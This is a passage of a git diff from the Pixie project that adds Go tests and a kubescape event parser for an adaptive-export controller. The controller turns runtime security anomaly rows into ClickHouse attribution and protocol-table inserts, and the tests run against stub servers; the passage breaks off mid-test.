+func TestController_OnPrune_FiresWithKeyDetails(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + var mu sync.Mutex + var pruned []attrCall + cfg := Config{ + Hostname: "node-1", Before: time.Minute, After: time.Minute, + OnPrune: func(ns, pod string) { + mu.Lock() + defer mu.Unlock() + pruned = append(pruned, attrCall{ns: ns, pod: pod}) + }, + } + c := New(trig, snk, cfg, clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "active=1", 200*time.Millisecond, func() bool { return c.Active() == 1 }) + clk.advance(3*time.Minute + time.Second) // past t_end + 2*After grace + if r := c.PruneExpired(); r != 1 { + t.Fatalf("PruneExpired removed %d, want 1", r) + } + mu.Lock() + defer mu.Unlock() + if len(pruned) != 1 { + t.Fatalf("OnPrune fired %d times, want 1", len(pruned)) + } + if pruned[0].pod == "" { + t.Fatalf("OnPrune called with empty pod: %+v", pruned[0]) + } +} + +// TestController_OnPrune_NilIsNoop — nil callback must not crash +// the prune loop. +func TestController_OnPrune_NilIsNoop(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + cfg := Config{Hostname: "node-1", Before: time.Minute, After: time.Minute} + cfg.OnPrune = nil // explicit + c := New(trig, snk, cfg, clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "active=1", 200*time.Millisecond, func() bool { return c.Active() == 1 }) + clk.advance(3*time.Minute + time.Second) + _ = c.PruneExpired() + // No panic = pass. +} + +// TestController_OnPrune_OnlyFiresWhenLastHashOnPodGone — multiple +// anomaly hashes can share a single (namespace, pod) when distinct +// PID×comm combinations on the same pod each get their own +// kubescape rule firing. 
Real-world example (sweep observation): +// pgsql-server has hashes for processes `postgres`, `pg_isready`, +// and `runc:[2:INIT]` — three hashes, one pod. +// +// The streaming layer is pod-keyed, so OnPrune(ns, pod) must only +// fire when the LAST hash for that pod is evicted. Premature firing +// would stop the per-pod stream while other hashes are still active. +// CR feedback (controller.go:156) caught this; see comment thread. +func TestController_OnPrune_OnlyFiresWhenLastHashOnPodGone(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + + var mu sync.Mutex + var prunedPods []string + cfg := Config{ + Hostname: "node-1", Before: time.Minute, After: time.Minute, + OnPrune: func(ns, pod string) { + mu.Lock() + defer mu.Unlock() + prunedPods = append(prunedPods, ns+"/"+pod) + }, + } + c := New(trig, snk, cfg, clk) + stop := runController(t, c, trig) + defer stop() + + // Two events on the SAME pod but with different (PID, Comm) so + // anomaly.Hash returns two distinct hashes. + mkEvent := func(pid uint64, comm string) kubescape.Event { + return kubescape.Event{ + Target: anomaly.Target{ + PID: pid, Comm: comm, Pod: "pgsql-server-x", Namespace: "px", + }, + EventTime: uint64(canonicalEventTime.UnixNano()), + RuleID: "R1", Hostname: "node-1", + } + } + trig.push(mkEvent(100, "postgres")) + trig.push(mkEvent(200, "pg_isready")) + waitFor(t, "two distinct hashes active", 300*time.Millisecond, func() bool { + return c.Active() == 2 + }) + + // Advance past TEnd + 2*After so BOTH hashes are evictable. + clk.advance(3*time.Minute + time.Second) + if r := c.PruneExpired(); r != 2 { + t.Fatalf("PruneExpired removed %d, want 2 hashes", r) + } + mu.Lock() + defer mu.Unlock() + if len(prunedPods) != 1 { + t.Fatalf("OnPrune fired %d times for one pod with 2 hashes; want 1. 
Calls: %v", + len(prunedPods), prunedPods) + } + if prunedPods[0] != "px/pgsql-server-x" { + t.Fatalf("wrong pod pruned: %q", prunedPods[0]) + } +} + +// TestController_OnPrune_DoesNotFireWhileOtherHashesActive — inverse +// case: only ONE hash on a pod expires; OnPrune must NOT fire for +// that pod because other hashes for the same pod remain active. +func TestController_OnPrune_DoesNotFireWhileOtherHashesActive(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + + var mu sync.Mutex + var prunedPods []string + cfg := Config{ + Hostname: "node-1", Before: time.Minute, After: time.Minute, + OnPrune: func(ns, pod string) { + mu.Lock() + defer mu.Unlock() + prunedPods = append(prunedPods, ns+"/"+pod) + }, + } + c := New(trig, snk, cfg, clk) + stop := runController(t, c, trig) + defer stop() + + mkEvent := func(pid uint64) kubescape.Event { + return kubescape.Event{ + Target: anomaly.Target{ + PID: pid, Comm: "c", Pod: "samepod", Namespace: "ns", + }, + EventTime: uint64(canonicalEventTime.UnixNano()), + RuleID: "R1", Hostname: "node-1", + } + } + trig.push(mkEvent(100)) + waitFor(t, "1 hash", 300*time.Millisecond, func() bool { return c.Active() == 1 }) + + // Advance time so first hash's TEnd is in the past but not yet + // past the 2*After grace. Then push second hash on the same pod. + clk.advance(2 * time.Minute) + trig.push(mkEvent(200)) + waitFor(t, "2 hashes", 300*time.Millisecond, func() bool { return c.Active() == 2 }) + + // Advance to where the FIRST hash is past grace (3m after its + // creation) but the SECOND is still alive (its TEnd is at + // canonical+3m; grace would be +5m). Total clock progression + // from canonical: 2m + 1m + 1s = 3m1s. 
+ clk.advance(time.Minute + time.Second) + removed := c.PruneExpired() + if removed != 1 { + t.Fatalf("PruneExpired removed %d, want 1 (only the old hash)", removed) + } + mu.Lock() + defer mu.Unlock() + if len(prunedPods) != 0 { + t.Fatalf("OnPrune fired for a pod that still has 1 active hash; calls: %v", prunedPods) + } +} + +// TestController_OnAttribution_NotHeldUnderMutex — a slow callback +// must NOT block PruneExpired's progress (the controller must not +// be holding its own mutex while invoking user code). +// +// We arrange a synchronous OnPrune that blocks until we signal, +// then call PruneExpired in a goroutine and confirm that we can +// independently call Active() (which acquires the same mutex) +// without deadlocking. +func TestController_OnPrune_DoesNotHoldMutex(t *testing.T) { + trig := newFakeTrigger() + snk := &fakeSink{} + clk := &fakeClock{t: canonicalEventTime} + + pruneInCallback := make(chan struct{}) + release := make(chan struct{}) + + cfg := Config{ + Hostname: "node-1", Before: time.Minute, After: time.Minute, + OnPrune: func(ns, pod string) { + close(pruneInCallback) + <-release + }, + } + c := New(trig, snk, cfg, clk) + stop := runController(t, c, trig) + defer stop() + + trig.push(canonicalEvent()) + waitFor(t, "active=1", 200*time.Millisecond, func() bool { return c.Active() == 1 }) + + clk.advance(3*time.Minute + time.Second) + + pruneDone := make(chan struct{}) + go func() { + _ = c.PruneExpired() + close(pruneDone) + }() + + // Wait until the prune is inside the callback. + select { + case <-pruneInCallback: + case <-time.After(500 * time.Millisecond): + t.Fatalf("OnPrune did not fire within 500ms") + } + + // Active() acquires the same mutex; if PruneExpired holds it + // across the callback, this blocks forever. 
+ activeDone := make(chan int, 1) + go func() { activeDone <- c.Active() }() + + select { + case n := <-activeDone: + if n != 0 { + t.Fatalf("expected Active=0 (eviction happened before callback), got %d", n) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("Active() blocked — PruneExpired is holding the mutex across user callback") + } + + close(release) + <-pruneDone +} + +// TestEmptyResultSkip_NamespaceIsolation — the negative cache must +// not let one namespace's empty-streak suppress queries for a same- +// named pod in a different namespace. Two pods named "api" in "ns-a" +// vs "ns-b" sharing a single PEM node previously collided because +// the cache key was just "pod|table". +func TestEmptyResultSkip_NamespaceIsolation(t *testing.T) { + clk := &fakeClock{t: canonicalEventTime} + c := New(newFakeTrigger(), &fakeSink{}, Config{ + Hostname: "node-1", + Before: time.Minute, + After: time.Minute, + EmptyResultSkipAfterN: 2, + EmptyResultSkipTTL: 5 * time.Minute, + }, clk) + + const table = "stirling_http_events" + // Drive ns-a/api to N empty results — should arm the skip cache for ns-a/api only. + for i := 0; i < 2; i++ { + c.noteQueryResult("ns-a", "api", table, 0) + } + if !c.shouldSkipEmpty("ns-a", "api", table) { + t.Fatalf("ns-a/api should be skip-armed after 2 empties") + } + if c.shouldSkipEmpty("ns-b", "api", table) { + t.Fatalf("ns-b/api was wrongly suppressed by ns-a/api's empty streak " + + "(skip cache key conflates namespaces)") + } +} diff --git a/src/vizier/services/adaptive_export/internal/e2e/BUILD.bazel b/src/vizier/services/adaptive_export/internal/e2e/BUILD.bazel new file mode 100644 index 00000000000..0721c6caa60 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/e2e/BUILD.bazel @@ -0,0 +1,31 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("//bazel:pl_build_system.bzl", "pl_go_test") + +pl_go_test( + name = "e2e_test", + srcs = [ + "e2e_test.go", + "loadtest_test.go", + ], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + "//src/vizier/services/adaptive_export/internal/controller", + "//src/vizier/services/adaptive_export/internal/sink", + "//src/vizier/services/adaptive_export/internal/trigger", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/e2e/e2e_test.go b/src/vizier/services/adaptive_export/internal/e2e/e2e_test.go new file mode 100644 index 00000000000..4f2f0c2fc94 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/e2e/e2e_test.go @@ -0,0 +1,176 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package e2e wires the real Trigger + real Sink (both HTTP-backed) +// to a stub ClickHouse in-process and exercises the full +// kubescape→attribution path end-to-end. 
This is the highest-fidelity +// test that runs in `go test`. Real-cluster validation lives on the +// lab. +package e2e + +import ( + "bytes" + "context" + "encoding/json" + "io" + "net/http" + "net/http/httptest" + "strings" + "sync" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger" +) + +// stubClickHouse emulates ClickHouse's HTTP interface: GET responds +// with a fixed kubescape_logs JSONEachRow body; POST records the +// INSERT body for later assertion. +type stubClickHouse struct { + mu sync.Mutex + kubescape []map[string]any + insertedSQL []string + insertBody [][]byte +} + +func (s *stubClickHouse) handle(w http.ResponseWriter, r *http.Request) { + q := r.URL.Query().Get("query") + switch r.Method { + case http.MethodGet: + if !strings.Contains(q, "FROM forensic_db.kubescape_logs") { + http.Error(w, "unexpected SELECT: "+q, 400) + return + } + if !strings.Contains(q, "hostname = 'node-1'") { + http.Error(w, "missing hostname filter: "+q, 400) + return + } + s.mu.Lock() + var buf bytes.Buffer + enc := json.NewEncoder(&buf) + enc.SetEscapeHTML(false) + for _, row := range s.kubescape { + _ = enc.Encode(row) + } + s.mu.Unlock() + w.WriteHeader(200) + _, _ = w.Write(buf.Bytes()) + case http.MethodPost: + body, _ := io.ReadAll(r.Body) + s.mu.Lock() + s.insertedSQL = append(s.insertedSQL, q) + s.insertBody = append(s.insertBody, body) + s.mu.Unlock() + w.WriteHeader(200) + default: + http.Error(w, "method", http.StatusMethodNotAllowed) + } +} + +func (s *stubClickHouse) bodies() [][]byte { + s.mu.Lock() + defer s.mu.Unlock() + out := make([][]byte, len(s.insertBody)) + for i, b := range s.insertBody { + out[i] = append([]byte{}, b...) 
+ } + return out +} + +func canonicalKubescapeRow() map[string]any { + return map[string]any{ + "RuleID": "R1005", + "RuntimeK8sDetails": `{"podName":"redis-578d5dc9bd-kjj78","podNamespace":"redis"}`, + "RuntimeProcessDetails": `{"processTree":{"pid":106040,"comm":"redis-server"}}`, + "event_time": "1744477360303026359", + "hostname": "node-1", + } +} + +// TestE2E_PushFlow_AttributionRowArrives — full chain: stub-CH serves a +// kubescape row → real Trigger discovers and parses → real Controller +// computes hash + opens active row → real Sink HTTP-POSTs INSERT to +// adaptive_attribution. Assert the resulting body carries the right hash. +func TestE2E_PushFlow_AttributionRowArrives(t *testing.T) { + stub := &stubClickHouse{kubescape: []map[string]any{canonicalKubescapeRow()}} + srv := httptest.NewServer(http.HandlerFunc(stub.handle)) + defer srv.Close() + + trg, err := trigger.New(trigger.Config{ + Endpoint: srv.URL, + Hostname: "node-1", + PollInterval: 30 * time.Millisecond, + }) + if err != nil { + t.Fatalf("trigger.New: %v", err) + } + snk, err := sink.New(sink.Config{Endpoint: srv.URL}) + if err != nil { + t.Fatalf("sink.New: %v", err) + } + cfg := controller.Config{Hostname: "node-1", Before: time.Minute, After: time.Minute} + ctl := controller.New(trg, snk, cfg, nil) + + ctx, cancel := context.WithCancel(context.Background()) + done := make(chan struct{}) + go func() { _ = ctl.Run(ctx); close(done) }() + defer func() { + cancel() + select { + case <-done: + case <-time.After(2 * time.Second): + t.Fatalf("controller did not stop within 2s of cancel") + } + }() + + deadline := time.Now().Add(2 * time.Second) + for time.Now().Before(deadline) && len(stub.bodies()) == 0 { + time.Sleep(5 * time.Millisecond) + } + bodies := stub.bodies() + if len(bodies) == 0 { + t.Fatalf("no INSERTs reached stub-CH within 2s") + } + + wantHash := string(anomaly.Hash(anomaly.Target{ + PID: 106040, Comm: "redis-server", + Pod: "redis-578d5dc9bd-kjj78", Namespace: "redis", + })) + 
matched := false + for _, b := range bodies { + if strings.Contains(string(b), `"anomaly_hash":"`+wantHash+`"`) && + strings.Contains(string(b), `"hostname":"node-1"`) && + strings.Contains(string(b), `"namespace":"redis"`) && + strings.Contains(string(b), `"pid":106040`) { + matched = true + break + } + } + if !matched { + t.Fatalf("no INSERT body had the expected attribution shape; bodies=\n%s", joinBodies(bodies)) + } +} + +func joinBodies(bs [][]byte) string { + out := make([]string, len(bs)) + for i, b := range bs { + out[i] = string(b) + } + return strings.Join(out, "\n---\n") +} diff --git a/src/vizier/services/adaptive_export/internal/e2e/loadtest_test.go b/src/vizier/services/adaptive_export/internal/e2e/loadtest_test.go new file mode 100644 index 00000000000..3f88e90bf96 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/e2e/loadtest_test.go @@ -0,0 +1,256 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// L1 — hermetic load-test layer for the AE write surface. +// +// This is the deterministic, in-process counterpart to the live (L3) rig +// experiments in /home/croedig/pixie/aeload. It exercises the SAME real +// Trigger + Controller + Sink chain as e2e_test.go, but feeds Pixie's data +// plane from a MOCK PixieQuerier returning a CANNED row set. 
Both the kubescape +// trigger fixture and the Pixie capture are therefore fully controlled, so the +// AE write surface — control plane (adaptive_attribution) AND data plane +// (per-protocol-table rows + bytes) — is a pure function of the inputs. +// +// Reproducibility is proven by running the whole chain REPS times and asserting +// that every per-table row count, byte total, and the attribution count is +// identical across all reps (std = 0 / a single distinct value). Single-pull is +// forced via PushRefreshInterval = -1 (single-shot), the same effect the L3 +// config achieves on the rig — so the non-deduping MergeTree protocol tables +// never get duplicate re-inserts. +package e2e + +import ( + "context" + "fmt" + "net/http" + "net/http/httptest" + "regexp" + "strings" + "testing" + "time" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/controller" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/sink" + "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger" +) + +// newStubServer starts an httptest server backed by the stub-CH handler. +func newStubServer(s *stubClickHouse) *httptest.Server { + return httptest.NewServer(http.HandlerFunc(s.handle)) +} + +// sqls returns a copy of the recorded INSERT query strings, index-aligned with +// bodies(). +func (s *stubClickHouse) sqls() []string { + s.mu.Lock() + defer s.mu.Unlock() + out := make([]string, len(s.insertedSQL)) + copy(out, s.insertedSQL) + return out +} + +// fixedClock pins now() so the window math is identical every rep. +type fixedClock struct{ t time.Time } + +func (f fixedClock) Now() time.Time { return f.t } + +// cannedQuerier is the mock Pixie data plane: it returns a fixed number of +// fixed rows per protocol table, parsed from the table name embedded in the +// PxL (px.DataFrame(table='')). Everything else returns 0 rows — exactly how +// a silent pod looks to real Pixie. 
type cannedQuerier struct {
	perTable map[string]int // table -> row count to synthesize
}

// tableInPxL captures the table name from a table='...' argument in a PxL script.
var tableInPxL = regexp.MustCompile(`table='([^']+)'`)

// insertIntoRe captures the destination table of a forensic_db JSONEachRow
// INSERT. Compiled once at package scope: measure runs on every poll iteration.
var insertIntoRe = regexp.MustCompile(`INSERT INTO forensic_db\.(\w+) FORMAT JSONEachRow`)

// Query returns perTable[table] synthetic rows for the table named in pxl.
// A table that is absent from perTable yields zero rows and a nil error; a
// script with no table='...' argument is an error. The context is ignored.
func (q *cannedQuerier) Query(_ context.Context, pxl string) ([]map[string]any, error) {
	m := tableInPxL.FindStringSubmatch(pxl)
	if m == nil {
		return nil, fmt.Errorf("cannedQuerier: no table in pxl: %s", pxl)
	}
	n := q.perTable[m[1]]
	rows := make([]map[string]any, 0, n)
	for i := 0; i < n; i++ {
		// Deterministic, fully-specified row. encoding/json sorts map keys,
		// so the serialized bytes are byte-identical every rep.
		rows = append(rows, map[string]any{
			"time_":     1744477360303026359 + int64(i),
			"namespace": "aeload",
			"pod":       "aeload/gen-l1",
			"req_path":  fmt.Sprintf("/ping/%d", i),
			"table":     m[1],
		})
	}
	return rows, nil
}

// counts holds the per-rep measurement of what reached "ClickHouse".
type counts struct {
	rowsByTable  map[string]int
	bytesByTable map[string]int
	attribution  int
}

// measure parses the stub-CH insert bodies into per-table row/byte counts.
//
// sqls and bodies are index-aligned: bodies[i] is the payload of sqls[i].
// Statements that are not a forensic_db JSONEachRow INSERT are skipped. Rows
// are counted as non-blank lines of the body. adaptive_attribution rows are
// tallied in counts.attribution only and never appear in the per-table maps.
func measure(sqls []string, bodies [][]byte) counts {
	c := counts{rowsByTable: map[string]int{}, bytesByTable: map[string]int{}}
	for i, q := range sqls {
		if i >= len(bodies) {
			// The two slices are separate snapshots; never index past the
			// shorter one.
			break
		}
		m := insertIntoRe.FindStringSubmatch(q)
		if m == nil {
			continue
		}
		table := m[1]
		body := bodies[i]
		nrows := 0
		for _, line := range strings.Split(strings.TrimRight(string(body), "\n"), "\n") {
			if strings.TrimSpace(line) != "" {
				nrows++
			}
		}
		if table == "adaptive_attribution" {
			c.attribution += nrows
			continue
		}
		c.rowsByTable[table] += nrows
		c.bytesByTable[table] += len(body)
	}
	return c
}

// runOnce drives the full Trigger→Controller→Sink chain against a fresh stub-CH
// serving exactly one kubescape row, with the canned Pixie data plane, and
// returns the measured AE write surface.
+func runOnce(t *testing.T, perTable map[string]int) counts { + t.Helper() + stub := &stubClickHouse{kubescape: []map[string]any{canonicalKubescapeRow()}} + srv := newStubServer(stub) + defer srv.Close() + + trg, err := trigger.New(trigger.Config{ + Endpoint: srv.URL, + Hostname: "node-1", + PollInterval: 10 * time.Millisecond, + }) + if err != nil { + t.Fatalf("trigger.New: %v", err) + } + snk, err := sink.New(sink.Config{Endpoint: srv.URL}) + if err != nil { + t.Fatalf("sink.New: %v", err) + } + + tables := make([]string, 0, len(perTable)) + for tn := range perTable { + tables = append(tables, tn) + } + cfg := controller.Config{ + Hostname: "node-1", + Before: time.Minute, + After: time.Minute, + PushPixieTables: tables, + PushRefreshInterval: -1, // single-shot: exactly one pull, no MergeTree dup inflation + } + clk := fixedClock{t: time.Unix(1744477370, 0)} // > event_time, so window is open + ctl := controller.New(trg, snk, cfg, clk).WithPixieQuerier(&cannedQuerier{perTable: perTable}) + + ctx, cancel := context.WithCancel(context.Background()) + done := make(chan struct{}) + go func() { _ = ctl.Run(ctx); close(done) }() + + // Wait until the attribution row AND all expected protocol-table inserts + // have landed (or timeout). Expected protocol inserts = one per table with + // a non-zero canned count. + wantTables := 0 + for _, n := range perTable { + if n > 0 { + wantTables++ + } + } + deadline := time.Now().Add(3 * time.Second) + for time.Now().Before(deadline) { + c := measure(stub.sqls(), stub.bodies()) + if c.attribution >= 1 && len(c.rowsByTable) >= wantTables { + break + } + time.Sleep(5 * time.Millisecond) + } + cancel() + select { + case <-done: + case <-time.After(2 * time.Second): + t.Fatalf("controller did not stop within 2s") + } + return measure(stub.sqls(), stub.bodies()) +} + +// TestLoad_DataPlaneExactReproducible_L1 — the hermetic reproducibility proof. 
+func TestLoad_DataPlaneExactReproducible_L1(t *testing.T) { + const reps = 100 + perTable := map[string]int{ + "http_events": 100, + "dns_events": 100, + "pgsql_events": 100, + } + + var first counts + for rep := 0; rep < reps; rep++ { + got := runOnce(t, perTable) + + // Per-rep exactness: write surface == canned input (write ⊇ read with + // equality) + exactly one attribution row. + for tbl, want := range perTable { + if got.rowsByTable[tbl] != want { + t.Fatalf("rep %d: %s rows = %d, want %d", rep, tbl, got.rowsByTable[tbl], want) + } + } + if got.attribution != 1 { + t.Fatalf("rep %d: adaptive_attribution rows = %d, want 1", rep, got.attribution) + } + if len(got.rowsByTable) != len(perTable) { + t.Fatalf("rep %d: unexpected tables written: %v", rep, keysOf(got.rowsByTable)) + } + + if rep == 0 { + first = got + continue + } + // Cross-rep exactness: identical rows AND bytes => std = 0 => CV = 0. + for tbl := range perTable { + if got.rowsByTable[tbl] != first.rowsByTable[tbl] { + t.Fatalf("rep %d: %s row count drifted: %d != %d (rep 0)", rep, tbl, got.rowsByTable[tbl], first.rowsByTable[tbl]) + } + if got.bytesByTable[tbl] != first.bytesByTable[tbl] { + t.Fatalf("rep %d: %s byte total drifted: %d != %d (rep 0)", rep, tbl, got.bytesByTable[tbl], first.bytesByTable[tbl]) + } + } + } + t.Logf("L1 reproducible across %d reps: http=%d(%dB) dns=%d(%dB) pgsql=%d(%dB) attribution=%d", + reps, + first.rowsByTable["http_events"], first.bytesByTable["http_events"], + first.rowsByTable["dns_events"], first.bytesByTable["dns_events"], + first.rowsByTable["pgsql_events"], first.bytesByTable["pgsql_events"], + first.attribution) +} + +func keysOf(m map[string]int) []string { + out := make([]string, 0, len(m)) + for k := range m { + out = append(out, k) + } + return out +} diff --git a/src/vizier/services/adaptive_export/internal/kubescape/BUILD.bazel b/src/vizier/services/adaptive_export/internal/kubescape/BUILD.bazel new file mode 100644 index 00000000000..47b9b0b3481 --- 
/dev/null +++ b/src/vizier/services/adaptive_export/internal/kubescape/BUILD.bazel @@ -0,0 +1,37 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "kubescape", + srcs = ["extract.go"], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/kubescape", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + ], +) + +pl_go_test( + name = "kubescape_test", + srcs = ["extract_test.go"], + embed = [":kubescape"], + deps = [ + "//src/vizier/services/adaptive_export/internal/anomaly", + ], +) diff --git a/src/vizier/services/adaptive_export/internal/kubescape/extract.go b/src/vizier/services/adaptive_export/internal/kubescape/extract.go new file mode 100644 index 00000000000..be51d5159c0 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/kubescape/extract.go @@ -0,0 +1,117 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. 
+// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +// Package kubescape parses the Kubescape-shaped fields of a +// forensic_db.kubescape_logs row into the source-agnostic types used +// downstream: +// - anomaly.Target — workload identity (used to compute the hash) +// - Event — Target plus event-specific fields (event_time, +// rule id, hostname) needed for window math + persistence +// +// This package is the only place in the operator that knows the JSON +// shape of RuntimeK8sDetails / RuntimeProcessDetails. Once an Event +// has been extracted, no further code needs to care that the source +// was Kubescape. +package kubescape + +import ( + "encoding/json" + "errors" + "fmt" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +// ErrIncompleteEvent is returned by Extract when one of the required +// fields (event_time, rule id, comm, pid) is missing or unparseable. +// Pod and Namespace are NOT required — host-pid processes legitimately +// run with empty pod / namespace. +var ErrIncompleteEvent = errors.New("kubescape: incomplete event") + +// Row is the operator-facing shape of one forensic_db.kubescape_logs row. +// JSON-encoded fields stay as strings — the operator parses them itself +// to keep the ClickHouse driver layer simple. 
+type Row struct { + EventTime uint64 // schema: event_time UInt64 (unix nanos) + RuleID string + Hostname string + K8sDetails string // schema: RuntimeK8sDetails String (JSON) + ProcessDetails string // schema: RuntimeProcessDetails String (JSON) +} + +// Event is one parsed kubescape anomaly: workload identity + the bits +// we need for time-window math and ClickHouse persistence. +type Event struct { + Target anomaly.Target + EventTime uint64 // unix nanoseconds — propagated end-to-end + RuleID string // diagnostic only + Hostname string // node-local key +} + +// k8sDetails captures only pod / namespace; ignore the rest so JSON +// evolution upstream doesn't break us. +type k8sDetails struct { + PodName string `json:"podName"` + PodNamespace string `json:"podNamespace"` +} + +type processDetails struct { + ProcessTree struct { + PID uint64 `json:"pid"` + Comm string `json:"comm"` + } `json:"processTree"` +} + +// Extract parses a Row into an Event. Required fields are EventTime, +// RuleID, processTree.pid, processTree.comm. Pod and Namespace MAY be +// empty (host-pid processes outside any pod). Pure: no I/O, no clock. +func Extract(r Row) (Event, error) { + if r.RuleID == "" { + return Event{}, fmt.Errorf("%w: RuleID empty", ErrIncompleteEvent) + } + if r.EventTime == 0 { + return Event{}, fmt.Errorf("%w: EventTime zero", ErrIncompleteEvent) + } + // K8sDetails is OPTIONAL at parse time — host-pid events legitimately + // have no pod/namespace. We only error on malformed JSON. 
+ var k8s k8sDetails + if r.K8sDetails != "" { + if err := json.Unmarshal([]byte(r.K8sDetails), &k8s); err != nil { + return Event{}, fmt.Errorf("%w: parse RuntimeK8sDetails: %v", ErrIncompleteEvent, err) + } + } + var proc processDetails + if err := json.Unmarshal([]byte(r.ProcessDetails), &proc); err != nil { + return Event{}, fmt.Errorf("%w: parse RuntimeProcessDetails: %v", ErrIncompleteEvent, err) + } + if proc.ProcessTree.Comm == "" { + return Event{}, fmt.Errorf("%w: processTree.comm empty", ErrIncompleteEvent) + } + if proc.ProcessTree.PID == 0 { + return Event{}, fmt.Errorf("%w: processTree.pid zero", ErrIncompleteEvent) + } + return Event{ + Target: anomaly.Target{ + PID: proc.ProcessTree.PID, + Comm: proc.ProcessTree.Comm, + Pod: k8s.PodName, + Namespace: k8s.PodNamespace, + }, + EventTime: r.EventTime, + RuleID: r.RuleID, + Hostname: r.Hostname, + }, nil +} diff --git a/src/vizier/services/adaptive_export/internal/kubescape/extract_test.go b/src/vizier/services/adaptive_export/internal/kubescape/extract_test.go new file mode 100644 index 00000000000..90f10500d29 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/kubescape/extract_test.go @@ -0,0 +1,141 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. 
+// +// SPDX-License-Identifier: Apache-2.0 + +package kubescape + +import ( + "errors" + "testing" + + "px.dev/pixie/src/vizier/services/adaptive_export/internal/anomaly" +) + +const canonicalK8sDetails = `{"clusterName":"bobexample","containerName":"redis","namespace":"redis","podName":"redis-578d5dc9bd-kjj78","podNamespace":"redis","workloadName":"redis","workloadKind":"Deployment"}` + +const canonicalProcessDetails = `{"processTree":{"pid":106040,"cmdline":"redis-server 0.0.0.0:6379","comm":"redis-server","ppid":105965,"uid":999}}` + +func canonicalRow() Row { + return Row{ + EventTime: 1744477360303026359, + RuleID: "R1005", + Hostname: "node-1", + K8sDetails: canonicalK8sDetails, + ProcessDetails: canonicalProcessDetails, + } +} + +// TestExtract_FromCanonicalRow — pulls all four target fields plus +// EventTime + RuleID + Hostname from a real-shape kubescape row. +func TestExtract_FromCanonicalRow(t *testing.T) { + ev, err := Extract(canonicalRow()) + if err != nil { + t.Fatalf("Extract: %v", err) + } + if ev.Target.PID != 106040 { + t.Fatalf("PID = %d", ev.Target.PID) + } + if ev.Target.Comm != 